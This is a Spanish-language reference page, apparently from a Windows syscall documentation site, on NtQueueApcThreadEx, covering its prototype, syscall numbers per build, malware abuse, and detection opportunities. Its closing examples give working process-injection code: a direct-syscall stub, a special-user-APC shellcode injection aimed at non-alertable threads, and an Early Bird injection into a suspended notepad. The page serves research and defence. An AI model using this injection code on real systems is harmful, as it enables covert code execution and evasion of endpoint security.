NtQueueApcThreadEx
Encola un APC de usuario a un hilo con objeto reserva opcional o flag special-user-APC para entrega forzada.
Prototipo
NTSTATUS NtQueueApcThreadEx( HANDLE ThreadHandle, HANDLE UserApcReserveHandle, PKNORMAL_ROUTINE ApcRoutine, PVOID ApcArgument1, PVOID ApcArgument2, PVOID ApcArgument3 );
Argumentos
| Name | Type | Dir | Description |
|---|---|---|---|
| ThreadHandle | HANDLE | in | Handle al hilo objetivo con acceso THREAD_SET_CONTEXT. |
| UserApcReserveHandle | HANDLE | in | Objeto reserva user-APC opcional (NtAllocateReserveObject). Pasar QUEUE_USER_APC_FLAGS_SPECIAL_USER_APC (0x1) casteado a HANDLE para forzar el disparo (Win10 1809+). |
| ApcRoutine | PKNORMAL_ROUTINE | in | Rutina en modo usuario a ejecutar al entregar el APC. |
| ApcArgument1 | PVOID | in | Primer argumento pasado a ApcRoutine. Para special user APCs es el puntero CONTEXT* receptor. |
| ApcArgument2 | PVOID | in | Segundo argumento pasado a ApcRoutine. |
| ApcArgument3 | PVOID | in | Tercer argumento pasado a ApcRoutine. |
IDs de syscalls por versión de Windows
| Versión de Windows | ID de syscall | Build |
|---|---|---|
| Win10 1507 | 0x14B | win10-1507 |
| Win10 1607 | 0x152 | win10-1607 |
| Win10 1703 | 0x158 | win10-1703 |
| Win10 1709 | 0x15B | win10-1709 |
| Win10 1803 | 0x15D | win10-1803 |
| Win10 1809 | 0x15E | win10-1809 |
| Win10 1903 | 0x15F | win10-1903 |
| Win10 1909 | 0x15F | win10-1909 |
| Win10 2004 | 0x165 | win10-2004 |
| Win10 20H2 | 0x165 | win10-20h2 |
| Win10 21H1 | 0x165 | win10-21h1 |
| Win10 21H2 | 0x166 | win10-21h2 |
| Win10 22H2 | 0x166 | win10-22h2 |
| Win11 21H2 | 0x16D | win11-21h2 |
| Win11 22H2 | 0x170 | win11-22h2 |
| Win11 23H2 | 0x170 | win11-23h2 |
| Win11 24H2 | 0x172 | win11-24h2 |
| Server 2016 | 0x152 | winserver-2016 |
| Server 2019 | 0x15E | winserver-2019 |
| Server 2022 | 0x16B | winserver-2022 |
| Server 2025 | 0x172 | winserver-2025 |
Módulo del kernel
APIs relacionadas
Stub del syscall
4C 8B D1 mov r10, rcx B8 72 01 00 00 mov eax, 0x172 F6 04 25 08 03 FE 7F 01 test byte ptr [0x7FFE0308], 1 75 03 jne short +3 0F 05 syscall C3 ret CD 2E int 2Eh C3 ret
Notas no documentadas
Extensión de `NtQueueApcThread` introducida para el patrón de objeto reserva user-APC (evitar asignación de pool en cada encolado) y, desde Windows 10 1809, para **special user APCs** (`QUEUE_USER_APC_FLAGS_SPECIAL_USER_APC = 0x1`). El truco: pasar la constante `0x1` *como* `UserApcReserveHandle` cambia el kernel a una ruta que entrega el APC al hilo objetivo independientemente de su estado alertable — el kernel secuestra el `CONTEXT` user-mode del hilo y lo reanuda dentro de `ApcRoutine` con `ApcArgument1` apuntando a una estructura `CONTEXT` con el estado de registros original. La SSN deriva fuertemente entre builds; resolver dinámicamente.
Uso común por malware
Tres abusos notables. (1) **PoolParty** (SafeBreach 2023) usa special user APCs para inyectar en hilos que *nunca* se vuelven alertables — hilos de fondo modernos en navegadores y agentes EDR — derrotando completamente la defensa clásica « apuntar a un wait alertable ». (2) EarlyBird sigue viable pero se prefiere la forma Ex porque no requiere que el hilo objetivo alcance un wait alertable. (3) Cobalt Strike 4.x y Brute Ratel C4 usan la variante special-APC para ejecución fork&run que ya no necesita `CreateThread` en la víctima. T1055.004.
Oportunidades de detección
Los special user APCs aparecen como eventos ETW Threat Intelligence `EtwTiLogQueueApcThread` con el flag special-user-APC armado — los EDR modernos (CrowdStrike, Defender for Endpoint, SentinelOne) lo parsean. La entrega por CONTEXT secuestrado significa que el RIP del hilo objetivo salta súbitamente a una dirección fuera de módulo con un puntero CONTEXT en la pila — stack-walk y comprobaciones RIP-vs-VAD sobre eventos EtwTi lo capturan. Un `NtQueueApcThreadEx` entre procesos desde un padre no-debugger con el flag special-user-APC es casi siempre malicioso en la práctica.
Ejemplos de syscalls directos
asmx64 direct stub (Win11 24H2)
; Direct syscall stub for NtQueueApcThreadEx (SSN 0x172 on Win11 24H2)
NtQueueApcThreadEx PROC
mov r10, rcx ; syscall convention
mov eax, 0172h ; SSN — drifts; resolve dynamically for portability
syscall
ret
NtQueueApcThreadEx ENDPcSpecial user APC (PoolParty-style)
// Inject into a non-alertable target thread via QUEUE_USER_APC_FLAGS_SPECIAL_USER_APC.
#define QUEUE_USER_APC_FLAGS_SPECIAL_USER_APC ((HANDLE)0x1)
// hThread points at a worker thread that will never call SleepEx — classic EDR scrub thread.
// remote_shellcode was already written + RX-protected in the target process.
NTSTATUS st = NtQueueApcThreadEx(
hThread,
QUEUE_USER_APC_FLAGS_SPECIAL_USER_APC, // forces delivery via context hijack
(PKNORMAL_ROUTINE)remote_shellcode,
NULL, NULL, NULL);
if (!NT_SUCCESS(st)) return st;
// Kernel hijacks the thread's CONTEXT and resumes it inside remote_shellcode.cEarly Bird APC injection with Ex form
// Spawn target suspended; queue Ex-APC; resume.
STARTUPINFOA si = { .cb = sizeof(si) };
PROCESS_INFORMATION pi = { 0 };
CreateProcessA("C:\\Windows\\System32\\notepad.exe", NULL, NULL, NULL,
FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi);
SIZE_T size = shellcode_len;
PVOID remote = NULL;
NtAllocateVirtualMemory(pi.hProcess, &remote, 0, &size,
MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
NtWriteVirtualMemory(pi.hProcess, remote, shellcode, shellcode_len, NULL);
// Ex form lets us pick reserve object or special-APC; for EarlyBird either works.
NtQueueApcThreadEx(pi.hThread, NULL, (PKNORMAL_ROUTINE)remote, NULL, NULL, NULL);
NtResumeThread(pi.hThread, NULL);Mapeos MITRE ATT&CK
Last verified: 2026-05-20